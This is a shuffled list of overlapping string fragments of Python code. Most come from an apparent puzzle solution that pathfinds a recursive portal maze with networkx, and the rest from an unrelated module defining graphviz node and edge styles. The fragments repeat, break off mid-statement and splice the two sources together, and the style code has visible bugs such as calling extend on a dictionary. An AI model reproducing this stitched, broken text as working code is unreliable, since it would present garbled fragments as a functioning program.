paths =", "continue add_branches(acc_inner, level + 1, path_length) if level > 0 and acc_outer: add_branches(acc_outer,", "pid == 'ZZ' or (pid, dst_pos[1], level) in history: continue distance_to_goal = pathfind_recursive(get_other_exit(portal_list,", "-1) if outer_found: return outer_found return search_paths(acc_inner, 1) def pathfind_loop(world, portal_list, max_level): def", "obj != '.': continue if line[col - 1] == '.': world.add_edge((col, row), (col", "1) def is_outer(x, y): return x == 2 or y == 2 or", "get_other_exit(portal_list, pid, current[1]) to_check_branch.append((new_pos, new_level, new_length)) to_check_branch = [(portal_list['AA'][0], 0, 0)] solutions =", "history): print(level) def search_paths(accessible, dlevel): paths = [] for pid, dst_pos in accessible.items():", "or x == width - 4 or y == height - 3 def", "= accessible_portals(pos, portal_list, world) if level == 0 and 'ZZ' in acc_outer: return", "acc_outer['ZZ'][0] if level != 0 and acc_outer: outer_found = search_paths(acc_outer, -1) if outer_found:", "1].isalpha(): portals[obj + line[col + 1]].append((col + 2, row) if line[col + 2]", 
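# ---------------------------------------------------------------------------
# Illustrative aside (not part of the original solution): accessible_portals
# leans on two networkx behaviours, shown here on a toy graph that can be
# pasted into a REPL: dijkstra_path_length returns the hop count on an
# unweighted graph, and raises NetworkXNoPath for unreachable nodes, which
# the except clause above silently skips.
#
#     g = nx.Graph()
#     g.add_edge((0, 0), (1, 0))
#     g.add_node((5, 5))                                # disconnected node
#     assert nx.dijkstra_path_length(g, (0, 0), (1, 0)) == 1
#     try:
#         nx.dijkstra_path_length(g, (0, 0), (5, 5))
#     except nx.NetworkXNoPath:
#         pass                                          # unreachable, skipped
# ---------------------------------------------------------------------------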
"current[0] new_pos = get_other_exit(portal_list, pid, current[1]) to_check_branch.append((new_pos, new_level, new_length)) to_check_branch = [(portal_list['AA'][0], 0,", "!= current_pos][0] def pathfind_recursive(pos, level, portal_list, world, history): print(level) def search_paths(accessible, dlevel): paths", "'.': continue if line[col - 1] == '.': world.add_edge((col, row), (col - 1,", "f: lines = f.readlines() width = len(lines[0]) height = len(lines) W = direct_paths(lines)", "pid, dst_pos in accessible.items(): if pid == 'ZZ' or (pid, dst_pos[1], level) in", "new_length = current_length + 1 + current[0] new_pos = get_other_exit(portal_list, pid, current[1]) to_check_branch.append((new_pos,", "portal_list, world): acc_outer, acc_inner = {}, {} for portal_id in portal_list.keys(): if portal_id", "is_outer(*portal_pos) else acc_inner assert portal_id not in accessible accessible[portal_id] = dst, portal_pos except", "while to_check_branch: pos, level, path_length = to_check_branch.pop() acc_outer, acc_inner = accessible_portals(pos, portal_list, world)", "== height - 3 def accessible_portals(pos, portal_list, world): acc_outer, acc_inner = {}, {}", "1, row)) if lines[row - 1][col] == '.': world.add_edge((col, row), (col, row -", "= pathfind_recursive(get_other_exit(portal_list, pid, dst_pos[1]), level + dlevel, portal_list, world, history.union([(pid, dst_pos[1], level)])) paths.append(distance_to_goal", "1][col].isalpha(): portals[obj + lines[row + 1][col]].append((col, row - 1) if lines[row - 1][col]", "if portal_pos == pos: continue try: dst = nx.dijkstra_path_length(world, pos, portal_pos) accessible =", "level > 0 and acc_outer: add_branches(acc_outer, level - 1, path_length) return min(solutions) if", "+ acc_outer['ZZ'][0]) print(solutions[-1]) elif level >= max_level: continue add_branches(acc_inner, level + 1, path_length)", "portals in portal_list.values(): if len(portals) == 1: continue assert len(portals) == 2 world.add_edge(portals[0],", "current_length): for pid in [pid for pid in accessible.keys() if pid != 'ZZ']:", "portal_list[portal_id] if pos != current_pos][0] def pathfind_recursive(pos, level, portal_list, world, history): print(level) def", "+ 1 if distance_to_goal else None) paths = [path for path in paths", "lines[row - 1][col] == '.' else (col, row + 2)) return portals def", "in accessible accessible[portal_id] = dst, portal_pos except nx.NetworkXNoPath: pass return acc_outer, acc_inner def", "row)) if lines[row - 1][col] == '.': world.add_edge((col, row), (col, row - 1))", "1]].append((col + 2, row) if line[col + 2] == '.' else (col -", "acc_inner def get_other_exit(portal_list, portal_id, current_pos): return [pos for pos in portal_list[portal_id] if pos", "not in accessible accessible[portal_id] = dst, portal_pos except nx.NetworkXNoPath: pass return acc_outer, acc_inner", "try: dst = nx.dijkstra_path_length(world, pos, portal_pos) accessible = acc_outer if is_outer(*portal_pos) else acc_inner", "== '.': world.add_edge((col, row), (col - 1, row)) if lines[row - 1][col] ==", "accessible[portal_id] = dst, portal_pos except nx.NetworkXNoPath: pass return acc_outer, acc_inner def get_other_exit(portal_list, portal_id,", "row) if line[col + 2] == '.' 
else (col - 1, row)) elif", "- 1][col] == '.': world.add_edge((col, row), (col, row - 1)) return world def", "as f: lines = f.readlines() width = len(lines[0]) height = len(lines) W =", "for pid in [pid for pid in accessible.keys() if pid != 'ZZ']: current", "= accessible_portals(pos, portal_list, world) if level == 0 and 'ZZ' in acc_outer: solutions.append(path_length", "== 0 and 'ZZ' in acc_outer: solutions.append(path_length + acc_outer['ZZ'][0]) print(solutions[-1]) elif level >=", "defaultdict(list) for row,line in enumerate(lines[:-1]): for col,obj in enumerate(line): if not obj.isalpha(): continue", "accessible_portals(pos, portal_list, world) if level == 0 and 'ZZ' in acc_outer: return acc_outer['ZZ'][0]", "= [(portal_list['AA'][0], 0, 0)] solutions = [] while to_check_branch: pos, level, path_length =", "def search_portals(lines): portals = defaultdict(list) for row,line in enumerate(lines[:-1]): for col,obj in enumerate(line):", "return [pos for pos in portal_list[portal_id] if pos != current_pos][0] def pathfind_recursive(pos, level,", "== 'ZZ' or (pid, dst_pos[1], level) in history: continue distance_to_goal = pathfind_recursive(get_other_exit(portal_list, pid,", "def portal_paths(portal_list, world): for portals in portal_list.values(): if len(portals) == 1: continue assert", "add_branches(acc_outer, level - 1, path_length) return min(solutions) if solutions else None W =", "level, portal_list, world, history): print(level) def search_paths(accessible, dlevel): paths = [] for pid,", "== 'AA': continue for portal_pos in portal_list[portal_id]: if portal_pos == pos: continue try:", "defaultdict sys.setrecursionlimit(100000000) def direct_paths(lines): world = nx.Graph() for row,line in enumerate(lines): for col,obj", "nx.dijkstra_path(W, portal_connections['AA'][0], portal_connections['ZZ'][0]) print('part one', len(path) - 1) def is_outer(x, y): return x", "if lines[row - 1][col] == '.': world.add_edge((col, row), (col, row - 1)) return", "world = nx.Graph() for row,line in enumerate(lines): for col,obj in enumerate(line): if obj", "= pathfind_recursive(portal_connections['AA'][0], 0, portal_connections, W, set()) result = pathfind_loop(W, portal_connections, 100) print('part two',", "portal_pos except nx.NetworkXNoPath: pass return acc_outer, acc_inner def get_other_exit(portal_list, portal_id, current_pos): return [pos", "1 if distance_to_goal else None) paths = [path for path in paths if", "print(solutions[-1]) elif level >= max_level: continue add_branches(acc_inner, level + 1, path_length) if level", "= direct_paths(lines) #result = pathfind_recursive(portal_connections['AA'][0], 0, portal_connections, W, set()) result = pathfind_loop(W, portal_connections,", "1, path_length) if level > 0 and acc_outer: add_branches(acc_outer, level - 1, path_length)", "def direct_paths(lines): world = nx.Graph() for row,line in enumerate(lines): for col,obj in enumerate(line):", "lines[row + 1][col]].append((col, row - 1) if lines[row - 1][col] == '.' 
else", "if line[col + 1].isalpha(): portals[obj + line[col + 1]].append((col + 2, row) if", "portal_list, world, history.union([(pid, dst_pos[1], level)])) paths.append(distance_to_goal + dst_pos[0] + 1 if distance_to_goal else", "2 or y == 2 or x == width - 4 or y", "if distance_to_goal else None) paths = [path for path in paths if path]", "for portals in portal_list.values(): if len(portals) == 1: continue assert len(portals) == 2", "for path in paths if path] return min(paths) if paths else None acc_outer,", "def pathfind_recursive(pos, level, portal_list, world, history): print(level) def search_paths(accessible, dlevel): paths = []", "0 and acc_outer: outer_found = search_paths(acc_outer, -1) if outer_found: return outer_found return search_paths(acc_inner,", "elif lines[row + 1][col].isalpha(): portals[obj + lines[row + 1][col]].append((col, row - 1) if", "== '.': world.add_edge((col, row), (col, row - 1)) return world def search_portals(lines): portals", "= accessible[pid] new_length = current_length + 1 + current[0] new_pos = get_other_exit(portal_list, pid,", "in enumerate(line): if not obj.isalpha(): continue if line[col + 1].isalpha(): portals[obj + line[col", "new_level, new_length)) to_check_branch = [(portal_list['AA'][0], 0, 0)] solutions = [] while to_check_branch: pos,", "for pid, dst_pos in accessible.items(): if pid == 'ZZ' or (pid, dst_pos[1], level)", "def search_paths(accessible, dlevel): paths = [] for pid, dst_pos in accessible.items(): if pid", "pathfind_recursive(get_other_exit(portal_list, pid, dst_pos[1]), level + dlevel, portal_list, world, history.union([(pid, dst_pos[1], level)])) paths.append(distance_to_goal +", "== '.' else (col, row + 2)) return portals def portal_paths(portal_list, world): for", "add_branches(acc_inner, level + 1, path_length) if level > 0 and acc_outer: add_branches(acc_outer, level", "acc_inner = accessible_portals(pos, portal_list, world) if level == 0 and 'ZZ' in acc_outer:", "else (col, row + 2)) return portals def portal_paths(portal_list, world): for portals in", "2 or x == width - 4 or y == height - 3", "as nx import sys from collections import defaultdict sys.setrecursionlimit(100000000) def direct_paths(lines): world =", "= acc_outer if is_outer(*portal_pos) else acc_inner assert portal_id not in accessible accessible[portal_id] =", "if lines[row - 1][col] == '.' else (col, row + 2)) return portals", "if len(portals) == 1: continue assert len(portals) == 2 world.add_edge(portals[0], portals[1]) with open('day20.txt')", "'.' 
else (col - 1, row)) elif lines[row + 1][col].isalpha(): portals[obj + lines[row", "world def search_portals(lines): portals = defaultdict(list) for row,line in enumerate(lines[:-1]): for col,obj in", "portal_list, world) if level == 0 and 'ZZ' in acc_outer: solutions.append(path_length + acc_outer['ZZ'][0])", "+ 1 + current[0] new_pos = get_other_exit(portal_list, pid, current[1]) to_check_branch.append((new_pos, new_level, new_length)) to_check_branch", "import defaultdict sys.setrecursionlimit(100000000) def direct_paths(lines): world = nx.Graph() for row,line in enumerate(lines): for", "{}, {} for portal_id in portal_list.keys(): if portal_id == 'AA': continue for portal_pos", "and 'ZZ' in acc_outer: solutions.append(path_length + acc_outer['ZZ'][0]) print(solutions[-1]) elif level >= max_level: continue", "(col - 1, row)) if lines[row - 1][col] == '.': world.add_edge((col, row), (col,", "accessible.keys() if pid != 'ZZ']: current = accessible[pid] new_length = current_length + 1", "width = len(lines[0]) height = len(lines) W = direct_paths(lines) portal_connections = search_portals(lines) portal_paths(portal_connections,", "solutions else None W = direct_paths(lines) #result = pathfind_recursive(portal_connections['AA'][0], 0, portal_connections, W, set())", "= nx.Graph() for row,line in enumerate(lines): for col,obj in enumerate(line): if obj !=", "dst_pos in accessible.items(): if pid == 'ZZ' or (pid, dst_pos[1], level) in history:", "or y == 2 or x == width - 4 or y ==", "None W = direct_paths(lines) #result = pathfind_recursive(portal_connections['AA'][0], 0, portal_connections, W, set()) result =", "continue assert len(portals) == 2 world.add_edge(portals[0], portals[1]) with open('day20.txt') as f: lines =", "current[1]) to_check_branch.append((new_pos, new_level, new_length)) to_check_branch = [(portal_list['AA'][0], 0, 0)] solutions = [] while", "1] == '.': world.add_edge((col, row), (col - 1, row)) if lines[row - 1][col]", "= {}, {} for portal_id in portal_list.keys(): if portal_id == 'AA': continue for", "path_length) if level > 0 and acc_outer: add_branches(acc_outer, level - 1, path_length) return", "outer_found = search_paths(acc_outer, -1) if outer_found: return outer_found return search_paths(acc_inner, 1) def pathfind_loop(world,", "pass return acc_outer, acc_inner def get_other_exit(portal_list, portal_id, current_pos): return [pos for pos in", "if line[col - 1] == '.': world.add_edge((col, row), (col - 1, row)) if", "direct_paths(lines) portal_connections = search_portals(lines) portal_paths(portal_connections, W) path = nx.dijkstra_path(W, portal_connections['AA'][0], portal_connections['ZZ'][0]) print('part one',", "world) if level == 0 and 'ZZ' in acc_outer: solutions.append(path_length + acc_outer['ZZ'][0]) print(solutions[-1])", "print(level) def search_paths(accessible, dlevel): paths = [] for pid, dst_pos in accessible.items(): if", "== pos: continue try: dst = nx.dijkstra_path_length(world, pos, portal_pos) accessible = acc_outer if", "if path] return min(paths) if paths else None acc_outer, acc_inner = accessible_portals(pos, portal_list,", "outer_found: return outer_found return search_paths(acc_inner, 1) def pathfind_loop(world, portal_list, max_level): def add_branches(accessible, new_level,", "def accessible_portals(pos, portal_list, world): acc_outer, acc_inner = {}, {} for portal_id in portal_list.keys():", "search_portals(lines): portals = defaultdict(list) for row,line in enumerate(lines[:-1]): for col,obj in enumerate(line): if", "2] == '.' 
else (col - 1, row)) elif lines[row + 1][col].isalpha(): portals[obj", "if solutions else None W = direct_paths(lines) #result = pathfind_recursive(portal_connections['AA'][0], 0, portal_connections, W,", "= search_paths(acc_outer, -1) if outer_found: return outer_found return search_paths(acc_inner, 1) def pathfind_loop(world, portal_list,", "len(lines[0]) height = len(lines) W = direct_paths(lines) portal_connections = search_portals(lines) portal_paths(portal_connections, W) path", "line[col + 1]].append((col + 2, row) if line[col + 2] == '.' else", "if level != 0 and acc_outer: outer_found = search_paths(acc_outer, -1) if outer_found: return", "row - 1) if lines[row - 1][col] == '.' else (col, row +", "for portal_id in portal_list.keys(): if portal_id == 'AA': continue for portal_pos in portal_list[portal_id]:", "current_pos][0] def pathfind_recursive(pos, level, portal_list, world, history): print(level) def search_paths(accessible, dlevel): paths =", "portal_connections['AA'][0], portal_connections['ZZ'][0]) print('part one', len(path) - 1) def is_outer(x, y): return x ==", "accessible_portals(pos, portal_list, world): acc_outer, acc_inner = {}, {} for portal_id in portal_list.keys(): if", "or y == height - 3 def accessible_portals(pos, portal_list, world): acc_outer, acc_inner =", "portal_id in portal_list.keys(): if portal_id == 'AA': continue for portal_pos in portal_list[portal_id]: if", "to_check_branch = [(portal_list['AA'][0], 0, 0)] solutions = [] while to_check_branch: pos, level, path_length", "y): return x == 2 or y == 2 or x == width", "portal_list, world) if level == 0 and 'ZZ' in acc_outer: return acc_outer['ZZ'][0] if", "1][col] == '.' else (col, row + 2)) return portals def portal_paths(portal_list, world):", "path] return min(paths) if paths else None acc_outer, acc_inner = accessible_portals(pos, portal_list, world)", "if pid != 'ZZ']: current = accessible[pid] new_length = current_length + 1 +", "y == 2 or x == width - 4 or y == height", "for portal_pos in portal_list[portal_id]: if portal_pos == pos: continue try: dst = nx.dijkstra_path_length(world,", "+ lines[row + 1][col]].append((col, row - 1) if lines[row - 1][col] == '.'", "to_check_branch.pop() acc_outer, acc_inner = accessible_portals(pos, portal_list, world) if level == 0 and 'ZZ'", "1][col] == '.': world.add_edge((col, row), (col, row - 1)) return world def search_portals(lines):", "acc_outer, acc_inner def get_other_exit(portal_list, portal_id, current_pos): return [pos for pos in portal_list[portal_id] if", "if level == 0 and 'ZZ' in acc_outer: solutions.append(path_length + acc_outer['ZZ'][0]) print(solutions[-1]) elif", "direct_paths(lines): world = nx.Graph() for row,line in enumerate(lines): for col,obj in enumerate(line): if", "accessible = acc_outer if is_outer(*portal_pos) else acc_inner assert portal_id not in accessible accessible[portal_id]", "(col, row + 2)) return portals def portal_paths(portal_list, world): for portals in portal_list.values():", "== 1: continue assert len(portals) == 2 world.add_edge(portals[0], portals[1]) with open('day20.txt') as f:", "lines[row - 1][col] == '.': world.add_edge((col, row), (col, row - 1)) return world", "portals def portal_paths(portal_list, world): for portals in portal_list.values(): if len(portals) == 1: continue", "acc_outer, acc_inner = {}, {} for portal_id in portal_list.keys(): if portal_id == 'AA':", "pos != current_pos][0] def pathfind_recursive(pos, level, portal_list, world, history): print(level) def search_paths(accessible, dlevel):", "2 
world.add_edge(portals[0], portals[1]) with open('day20.txt') as f: lines = f.readlines() width = len(lines[0])", "return acc_outer, acc_inner def get_other_exit(portal_list, portal_id, current_pos): return [pos for pos in portal_list[portal_id]", "line[col + 2] == '.' else (col - 1, row)) elif lines[row +", "== 0 and 'ZZ' in acc_outer: return acc_outer['ZZ'][0] if level != 0 and", "world, history): print(level) def search_paths(accessible, dlevel): paths = [] for pid, dst_pos in", "== '.' else (col - 1, row)) elif lines[row + 1][col].isalpha(): portals[obj +", "else acc_inner assert portal_id not in accessible accessible[portal_id] = dst, portal_pos except nx.NetworkXNoPath:", "world.add_edge((col, row), (col - 1, row)) if lines[row - 1][col] == '.': world.add_edge((col,", "paths else None acc_outer, acc_inner = accessible_portals(pos, portal_list, world) if level == 0", "+ 2, row) if line[col + 2] == '.' else (col - 1,", "paths if path] return min(paths) if paths else None acc_outer, acc_inner = accessible_portals(pos,", "print('part one', len(path) - 1) def is_outer(x, y): return x == 2 or", "open('day20.txt') as f: lines = f.readlines() width = len(lines[0]) height = len(lines) W", "4 or y == height - 3 def accessible_portals(pos, portal_list, world): acc_outer, acc_inner", "col,obj in enumerate(line): if obj != '.': continue if line[col - 1] ==", "portals[1]) with open('day20.txt') as f: lines = f.readlines() width = len(lines[0]) height =", "level + dlevel, portal_list, world, history.union([(pid, dst_pos[1], level)])) paths.append(distance_to_goal + dst_pos[0] + 1", "1 + current[0] new_pos = get_other_exit(portal_list, pid, current[1]) to_check_branch.append((new_pos, new_level, new_length)) to_check_branch =", "search_paths(acc_inner, 1) def pathfind_loop(world, portal_list, max_level): def add_branches(accessible, new_level, current_length): for pid in", "portal_connections = search_portals(lines) portal_paths(portal_connections, W) path = nx.dijkstra_path(W, portal_connections['AA'][0], portal_connections['ZZ'][0]) print('part one', len(path)", "dst_pos[0] + 1 if distance_to_goal else None) paths = [path for path in", "in paths if path] return min(paths) if paths else None acc_outer, acc_inner =", "acc_outer: outer_found = search_paths(acc_outer, -1) if outer_found: return outer_found return search_paths(acc_inner, 1) def", "W = direct_paths(lines) #result = pathfind_recursive(portal_connections['AA'][0], 0, portal_connections, W, set()) result = pathfind_loop(W,", "- 1, path_length) return min(solutions) if solutions else None W = direct_paths(lines) #result", "[] while to_check_branch: pos, level, path_length = to_check_branch.pop() acc_outer, acc_inner = accessible_portals(pos, portal_list,", "= len(lines) W = direct_paths(lines) portal_connections = search_portals(lines) portal_paths(portal_connections, W) path = nx.dijkstra_path(W,", "acc_outer: return acc_outer['ZZ'][0] if level != 0 and acc_outer: outer_found = search_paths(acc_outer, -1)", "3 def accessible_portals(pos, portal_list, world): acc_outer, acc_inner = {}, {} for portal_id in", "if pos != current_pos][0] def pathfind_recursive(pos, level, portal_list, world, history): print(level) def search_paths(accessible,", "to_check_branch.append((new_pos, new_level, new_length)) to_check_branch = [(portal_list['AA'][0], 0, 0)] solutions = [] while to_check_branch:", "in accessible.keys() if pid != 'ZZ']: current = accessible[pid] new_length = current_length +", "import sys from collections import defaultdict 
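# A minimal sketch (the 3x3 toy maze below is hypothetical, not part of the
# puzzle input) showing how direct_paths links horizontally and vertically
# adjacent '.' cells into one walkable graph.
toy = ["###",
       "#..",
       "#.#"]
toy_world = direct_paths(toy)
assert nx.has_path(toy_world, (2, 1), (1, 2))  # corridor bends through (1, 1)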
def is_outer(x, y):
    # Outer portals sit on the maze's outer ring of labels.
    return x == 2 or y == 2 or x == width - 4 or y == height - 3


def accessible_portals(pos, portal_list, world):
    # Split the portals reachable from pos into outer and inner ones.
    acc_outer, acc_inner = {}, {}
    for portal_id in portal_list.keys():
        if portal_id == 'AA':
            continue
        for portal_pos in portal_list[portal_id]:
            if portal_pos == pos:
                continue
            try:
                dst = nx.dijkstra_path_length(world, pos, portal_pos)
                accessible = acc_outer if is_outer(*portal_pos) else acc_inner
                assert portal_id not in accessible
                accessible[portal_id] = dst, portal_pos
            except nx.NetworkXNoPath:
                pass
    return acc_outer, acc_inner


def get_other_exit(portal_list, portal_id, current_pos):
    return [pos for pos in portal_list[portal_id] if pos != current_pos][0]


def pathfind_recursive(pos, level, portal_list, world, history):
    print(level)

    def search_paths(accessible, dlevel):
        paths = []
        for pid, dst_pos in accessible.items():
            if pid == 'ZZ' or (pid, dst_pos[1], level) in history:
                continue
            distance_to_goal = pathfind_recursive(
                get_other_exit(portal_list, pid, dst_pos[1]),
                level + dlevel, portal_list, world,
                history.union([(pid, dst_pos[1], level)]))
            paths.append(distance_to_goal + dst_pos[0] + 1
                         if distance_to_goal else None)
        paths = [path for path in paths if path]
        return min(paths) if paths else None

    acc_outer, acc_inner = accessible_portals(pos, portal_list, world)
    if level == 0 and 'ZZ' in acc_outer:
        return acc_outer['ZZ'][0]
    if level != 0 and acc_outer:
        outer_found = search_paths(acc_outer, -1)
        if outer_found:
            return outer_found
    return search_paths(acc_inner, 1)


def pathfind_loop(world, portal_list, max_level):
    # Iterative variant: a work stack of (position, level, path length) states.
    def add_branches(accessible, new_level, current_length):
        for pid in [pid for pid in accessible.keys() if pid != 'ZZ']:
            current = accessible[pid]
            new_length = current_length + 1 + current[0]
            new_pos = get_other_exit(portal_list, pid, current[1])
            to_check_branch.append((new_pos, new_level, new_length))

    to_check_branch = [(portal_list['AA'][0], 0, 0)]
    solutions = []
    while to_check_branch:
        pos, level, path_length = to_check_branch.pop()
        acc_outer, acc_inner = accessible_portals(pos, portal_list, world)
        if level == 0 and 'ZZ' in acc_outer:
            solutions.append(path_length + acc_outer['ZZ'][0])
            print(solutions[-1])
        elif level >= max_level:
            continue
        add_branches(acc_inner, level + 1, path_length)
        if level > 0 and acc_outer:
            add_branches(acc_outer, level - 1, path_length)
    return min(solutions) if solutions else None


W = direct_paths(lines)
#result = pathfind_recursive(portal_connections['AA'][0], 0, portal_connections, W, set())
result = pathfind_loop(W, portal_connections, 100)
print('part two', result)
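# pathfind_loop trades the recursion above for an explicit work stack. A
# generic sketch of that pattern (hypothetical names, independent of the maze
# code): pop a state, score finished states, push the neighbouring states.
def exhaustive_search(start, neighbours, is_goal, score):
    stack = [start]
    solutions = []
    while stack:
        state = stack.pop()
        if is_goal(state):
            solutions.append(score(state))
            continue
        stack.extend(neighbours(state))
    return min(solutions) if solutions else None

# Toy usage: count the steps needed to walk from 3 down to 0.
assert exhaustive_search(
    (3, 0),
    lambda s: [(s[0] - 1, s[1] + 1)],
    lambda s: s[0] == 0,
    lambda s: s[1]) == 3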
[ "Use of this source code is governed by the MIT license that can", "'18', 'penwidth': '0' }) class Intermediate(NodeStyle): \"\"\"Style for an intermediate compound node.\"\"\" def", "Chassis(NodeStyle): \"\"\"Style for a chassis compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style.update({", "of .dot attributes.\"\"\" return self.style class Consumption(EdgeStyle): \"\"\"Style for a consumption edge.\"\"\" def", "file. \"\"\" class NodeStyle(object): \"\"\"General class for node style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\"", "self.style = dict() for key, value in kwargs: self.style.extend(key, value) def GetStyle(self): \"\"\"Return", "def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'oval', 'fontsize': '24' }", ".dot attributes.\"\"\" return self.style class Consumption(EdgeStyle): \"\"\"Style for a consumption edge.\"\"\" def __init__(self,", "appearance of a dot file. Copyright (C) 2016-2017 <NAME>, JL Faulon's research group,", "= { 'shape': 'rectangle', 'color': 'red', 'fontsize': '18', 'penwidth': '1' } class Reaction(NodeStyle):", "__init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style = dict() for key, value in kwargs: self.style.extend(key, value)", "'color': 'green', 'fontsize': '18', 'penwidth': '0' }) class Intermediate(NodeStyle): \"\"\"Style for an intermediate", "return self.style class Consumption(EdgeStyle): \"\"\"Style for a consumption edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\"", "LICENSE.txt file. \"\"\" class NodeStyle(object): \"\"\"General class for node style.\"\"\" def __init__(self, **kwargs):", "self.style class Consumption(EdgeStyle): \"\"\"Style for a consumption edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs)", "'color': 'green', 'penwidth': '2', 'arrowsize': '2' } class Production(EdgeStyle): \"\"\"Style for a production", "= { 'color': 'green', 'penwidth': '2', 'arrowsize': '2' } class Production(EdgeStyle): \"\"\"Style for", "__init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'rectangle', 'fontsize': '18', 'penwidth': '0'", "a target compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape':", "found in the LICENSE.txt file. 
\"\"\" class NodeStyle(object): \"\"\"General class for node style.\"\"\"", "compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'rectangle', 'color':", "node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'oval', 'fontsize': '24'", "def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color': 'red', 'penwidth': '2', 'arrowsize':", "INRA Use of this source code is governed by the MIT license that", "**kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'oval', 'fontsize': '24' } class EdgeStyle(object):", "of key, value of .dot attributes.\"\"\" return self.style class Consumption(EdgeStyle): \"\"\"Style for a", "Faulon's research group, INRA Use of this source code is governed by the", "\"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'oval', 'fontsize': '24' } class EdgeStyle(object): \"\"\"General", "node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style.update({ 'shape': 'rectangle', 'fontcolor': 'green', 'color': 'green',", "= dict() for key, value in kwargs: self.style.extend(key, value) def GetStyle(self): \"\"\"Return a", "'18', 'penwidth': '0' } class Target(NodeStyle): \"\"\"Style for a target compound node.\"\"\" def", "a dictionnary of key, value of .dot attributes.\"\"\" return self.style class Consumption(EdgeStyle): \"\"\"Style", "'2', 'arrowsize': '2' } class Production(EdgeStyle): \"\"\"Style for a production edge.\"\"\" def __init__(self,", "a consumption edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color': 'green',", "a chassis compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style.update({ 'shape': 'rectangle', 'fontcolor':", "key, value of .dot attributes.\"\"\" return self.style class Consumption(EdgeStyle): \"\"\"Style for a consumption", "'shape': 'rectangle', 'fontcolor': 'green', 'color': 'green', 'fontsize': '18', 'penwidth': '0' }) class Intermediate(NodeStyle):", "'0' } class Target(NodeStyle): \"\"\"Style for a target compound node.\"\"\" def __init__(self, **kwargs):", "'fontsize': '24' } class EdgeStyle(object): \"\"\"General class for edge style.\"\"\" def __init__(self, **kwargs):", "'oval', 'fontsize': '24' } class EdgeStyle(object): \"\"\"General class for edge style.\"\"\" def __init__(self,", "license that can be found in the LICENSE.txt file. 
\"\"\" class NodeStyle(object): \"\"\"General", "dictionnary of key, value of .dot attributes.\"\"\" return self.style class Chassis(NodeStyle): \"\"\"Style for", "'fontcolor': 'green', 'color': 'green', 'fontsize': '18', 'penwidth': '0' }) class Intermediate(NodeStyle): \"\"\"Style for", "this source code is governed by the MIT license that can be found", "\"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color': 'green', 'penwidth': '2', 'arrowsize': '2' } class", "kwargs: self.style.extend(key, value) def GetStyle(self): \"\"\"Return a dictionnary of key, value of .dot", "attributes.\"\"\" return self.style class Consumption(EdgeStyle): \"\"\"Style for a consumption edge.\"\"\" def __init__(self, **kwargs):", "**kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color': 'green', 'penwidth': '2', 'arrowsize': '2' }", "edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color': 'red', 'penwidth': '2',", "compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style.update({ 'shape': 'rectangle', 'fontcolor': 'green', 'color':", "\"\"\"Return a dictionnary of key, value of .dot attributes.\"\"\" return self.style class Chassis(NodeStyle):", "for an intermediate compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = {", "for key, value in kwargs: self.style.extend(key, value) def GetStyle(self): \"\"\"Return a dictionnary of", "self.style = { 'shape': 'oval', 'fontsize': '24' } class EdgeStyle(object): \"\"\"General class for", "super().__init__(**kwargs) self.style = { 'color': 'green', 'penwidth': '2', 'arrowsize': '2' } class Production(EdgeStyle):", "for a reaction node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape':", "def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'rectangle', 'fontsize': '18', 'penwidth':", "dictionnary of key, value of .dot attributes.\"\"\" return self.style class Consumption(EdgeStyle): \"\"\"Style for", ".dot attributes.\"\"\" return self.style class Chassis(NodeStyle): \"\"\"Style for a chassis compound node.\"\"\" def", "for setting the appearance of a dot file. Copyright (C) 2016-2017 <NAME>, JL", "intermediate compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'rectangle',", "class Target(NodeStyle): \"\"\"Style for a target compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs)", "can be found in the LICENSE.txt file. \"\"\" class NodeStyle(object): \"\"\"General class for", "value of .dot attributes.\"\"\" return self.style class Consumption(EdgeStyle): \"\"\"Style for a consumption edge.\"\"\"", "class Reaction(NodeStyle): \"\"\"Style for a reaction node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style", "that can be found in the LICENSE.txt file. 
